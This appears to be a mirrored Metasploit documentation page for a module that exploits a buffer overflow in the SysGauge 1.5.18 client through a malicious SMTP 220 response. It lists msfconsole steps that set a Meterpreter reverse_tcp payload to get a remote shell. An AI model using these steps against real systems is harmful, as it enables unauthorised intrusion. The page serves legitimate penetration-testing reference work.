Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
Views: 11789
Vulnerable Application
This module will setup an SMTP server expecting a connection from SysGauge 1.5.18 via its SMTP server validation. The module sends a malicious response along in the 220 service ready response and exploits the client, resulting in an unprivileged shell.
The software is available for download from SysGauge.
Verification Steps
Install the application
Start msfconsole
Do:
use exploit/windows/smtp/sysgauge_client_bof
Do:
set payload windows/meterpreter/reverse_tcp
Do:
set LHOST ip
Do:
run
The user should put your
SRVHOST
or other applicable IP address in the SMTP configuration in the program, and hit the "Verify Email ..." button.You should get a shell.
Scenarios
Here is how to typically execute the module. Note that the client must input this SMTP server information under SysGauge Options and hit the "Verify Email ..." button.